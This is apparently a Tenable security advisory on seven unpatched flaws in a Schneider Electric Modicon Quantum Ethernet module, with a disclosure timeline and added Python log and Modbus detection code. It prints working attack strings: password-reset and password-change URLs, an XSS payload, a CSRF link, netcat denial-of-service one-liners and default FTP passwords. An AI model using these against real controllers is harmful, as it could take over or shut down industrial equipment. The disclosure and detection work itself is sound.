
[R1] Multiple Schneider Electric Modicon Quantum Vulnerabilities

Critical

Synopsis

Tenable found multiple vulnerabilities in the Schneider Electric Quantum Modicon 140 NOC 771 01 Ethernet Module.

CVE-2018-7809: Unauthenticated Password Reset

An unauthenticated remote attacker can delete the existing username and password for the HTTP server by visiting the following URL:

http://[ip]/unsecure/embedded/builtin?submit=Delete%20Password

This also has the side effect of resetting the web server username and password to the default USER/USER.

CVE-2018-7810: Reflected XSS

A reflected XSS vulnerability exists in the HTTP server's endpoint /goform/formTest. A remote attacker can insert JavaScript into the name parameter that will be executed in the context of the person who followed the link. An example follows:

http://[ip]/goform/formTest?name=<script>alert()</script>

CVE-2018-7811: Unauthenticated Password Change

The web server allows an authenticated remote user to change their password via the /secure/embedded/builtin endpoint. The web server also lets an unauthenticated remote attacker change users' passwords via the /unsecure/embedded/builtin endpoint. An example URL that changes the admin user's password to evilpass follows:

http://[ip]/unsecure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User

CVE-2018-7830: Unauthenticated Remote Denial of Service

A denial of service occurs when an unauthenticated remote attacker sends an HTTP request with no "\r\n\r\n" terminator. This will render the web server useless for ~1 minute. The following is a one-line proof of concept:

echo -e "GET /index.htm HTTP/1.1\r\nHost: 192.168.248.30" | nc 192.168.248.30 80

CVE-2018-7831: Cross-site request forgery

The password change functionality is implemented with an HTTP GET request in which the new password is specified. An anti-forgery token is not required to validate the request. Furthermore, the current password does not need to be specified in order to complete a password change. An attacker can forge a link to be sent to an authenticated victim. Once clicked, the password will be changed. Example URL:

http://[ip]/secure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User
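The web endpoints above can be watched for in the module's (or an upstream proxy's) access logs. The following is an added example, not code from the advisory or from Schneider: a small Python classifier that maps request lines to the CVEs above and runs it over constructed combined-format log lines. The log format and the script-injection heuristic are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined-log style) for demonstration; the endpoints
# and parameters are the ones named in this advisory, the hosts and times are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Aug/2018:10:01:02 +0000] "GET /index.htm HTTP/1.1" 200 512
10.0.0.9 - - [26/Aug/2018:10:02:17 +0000] "GET /unsecure/embedded/builtin?submit=Delete%20Password HTTP/1.1" 200 88
10.0.0.9 - - [26/Aug/2018:10:02:30 +0000] "GET /unsecure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User HTTP/1.1" 200 91
10.0.0.7 - - [26/Aug/2018:10:03:01 +0000] "GET /goform/formTest?name=%3Cscript%3Ealert()%3C/script%3E HTTP/1.1" 200 300
10.0.0.8 - - [26/Aug/2018:10:04:44 +0000] "GET /secure/embedded/builtin?Language=English&user=admin&passwd=x&cnfpasswd=x&subhttppwd=Save+User HTTP/1.1" 200 91
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')

def classify_request(method, target):
    """Return the advisory CVE a single request line matches, or None."""
    parts = urlsplit(target)
    q = parse_qs(parts.query)            # decodes %20 and '+' to spaces for us
    submit = q.get("submit", [""])[0]
    button = q.get("subhttppwd", [""])[0]
    if parts.path == "/unsecure/embedded/builtin":
        if submit == "Delete Password":
            return "CVE-2018-7809"        # unauthenticated reset to USER/USER
        if "passwd" in q and button == "Save User":
            return "CVE-2018-7811"        # unauthenticated password change
    if parts.path == "/secure/embedded/builtin" and method == "GET" and "passwd" in q:
        return "CVE-2018-7831"            # password change over GET: forgeable link
    if parts.path == "/goform/formTest":
        name = q.get("name", [""])[0]     # crude heuristic for script injection
        if re.search(r"<\s*script|javascript:|on\w+\s*=", name, re.I):
            return "CVE-2018-7810"
    return None

def scan_log(text):
    """Return (source, timestamp, cve, target) for every line matching an advisory pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        cve = classify_request(m["method"], m["target"])
        if cve:
            hits.append((m["src"], m["ts"], cve, m["target"]))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```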

Others

Tenable reported seven vulnerabilities to Schneider Electric. Schneider indicated one of our vulnerabilities (default accounts) was a duplicate and the other (Modbus denial of service) was not a vulnerability. However, we've decided to document them here.

Default FTP Accounts

We found a handful of default FTP accounts. Some of the passwords we used required a VxHash collision disclosed by H.D. Moore in 2010.

Username     Password
sysdiag      factorycast@schneider
fdruser      ssresurdf
fwupgrade    FaAmU5p2F~
loki         ZfTljublsx

Modbus Denial of Service

Modbus is accessible over TCP port 502. Tenable found that the following unauthenticated remote Modbus message will completely shut down the Ethernet module:

echo -ne "\x0\xa8\x0\x0\x0\x5\x0\x5a\x0\x7\x0" | nc 192.168.238.30 502
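Added example, not part of the advisory: decoding the proof-of-concept frame above with a minimal Modbus/TCP header parser and flagging function code 0x5a, which is not a public Modbus function code, when it comes from hosts that should only be polling registers. The allow-list of expected function codes is an assumption.

```python
import struct

# The 11-byte frame from this advisory's Modbus proof of concept, as a byte string.
ADVISORY_FRAME = b"\x00\xa8\x00\x00\x00\x05\x00\x5a\x00\x07\x00"

# Public Modbus function codes an ordinary register-polling HMI or historian uses.
# This allow-list is an assumption; derive the real one from a site's baseline traffic.
EXPECTED_FUNCTIONS = {1, 2, 3, 4, 5, 6, 15, 16, 23}

def parse_mbap(frame):
    """Decode the MBAP header and function code of one Modbus/TCP frame.

    Raises ValueError for frames that are too short, not Modbus, or whose
    length field disagrees with the bytes actually on the wire."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, pid, length, uid = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError("protocol id %d is not Modbus" % pid)
    if length != len(frame) - 6:
        raise ValueError("length field %d, but %d bytes follow it" % (length, len(frame) - 6))
    return {"transaction_id": tid, "unit_id": uid, "function": frame[7], "data": frame[8:]}

def is_unexpected(frame):
    """True when the frame is malformed or carries a function code outside the allow-list.

    The advisory frame uses function code 0x5a (90). That is not a public Modbus
    function code; Schneider uses it for its UMAS engineering protocol, so a host
    that is only supposed to poll registers should never send it. A monitor that
    sees 0x5a, or a malformed frame, from such a host has something to alert on."""
    try:
        pdu = parse_mbap(frame)
    except ValueError:
        return True
    return pdu["function"] not in EXPECTED_FUNCTIONS

if __name__ == "__main__":
    print(parse_mbap(ADVISORY_FRAME))    # function 90 (0x5a), data b'\x00\x07\x00'
    print(is_unexpected(ADVISORY_FRAME))  # True
```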

Solution

No patches for these vulnerabilities exist. However, in their advisory, Schneider Electric advises customers to follow their Modicon Controllers Platform Cyber Security Reference Manual. They also recommend customers configure access control lists and "protect Modicon products with network, industrial, and application firewalls."

Disclosure Timeline

08/26/2018 - 7 Issues Discovered
08/27/2018 - Schneider Electric informed by encrypted email. 90 day date is November 26, 2018.
08/30/2018 - Schneider informs Tenable that the disclosure has been forwarded internally. Schneider provides a new point of contact.
09/04/2018 - Tenable asks the new contact if they received the forwarded email.
09/07/2018 - Schneider confirms receipt and indicates the team is still assessing the disclosure.
09/20/2018 - Tenable asks for an update.
09/20/2018 - Schneider has no update yet.
09/26/2018 - Tenable asks for an update.
09/26/2018 - Schneider has no update yet.
09/28/2018 - Schneider confirms all vulnerabilities. However, the team hasn't confirmed if any of the vulnerabilities are duplicates yet.
10/12/2018 - Tenable asks for an update and reminds Schneider that 45 days remain.
10/12/2018 - Schneider indicates they'll know more soon.
10/23/2018 - Tenable asks for an update.
10/24/2018 - Schneider confirms 5 new vulnerabilities. Flags one as a duplicate and one as not impacted.
10/24/2018 - Tenable asks Schneider to assign CVE.
10/24/2018 - Schneider acknowledges.
11/19/2018 - Tenable reminds Schneider of the upcoming disclosure date.
11/20/2018 - Schneider indicates they'll have the bulletin for Tenable to review shortly.
11/21/2018 - Schneider provides 5 CVEs.
11/23/2018 - Schneider releases their advisory.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.


Risk Information

Tenable Advisory ID: TRA-2018-38
Credit: Jacob Baines, Anthony Bettini, Joseph Bingham, Chris Lyne, David Wells
CVSSv2 Base / Temporal Score: 9.7 / 9.7
CVSSv2 Vector: AV:N/AC:L/Au:N/C:P/I:C/A:C
Nessus Plugin ID: 119147
Affected Products: Modicon M340, Modicon Premium, Modicon Quantum, Modicon BMXNOR0200
Risk Factor: Critical

Advisory Timeline

11/21/2018 - [R1] Initial Release
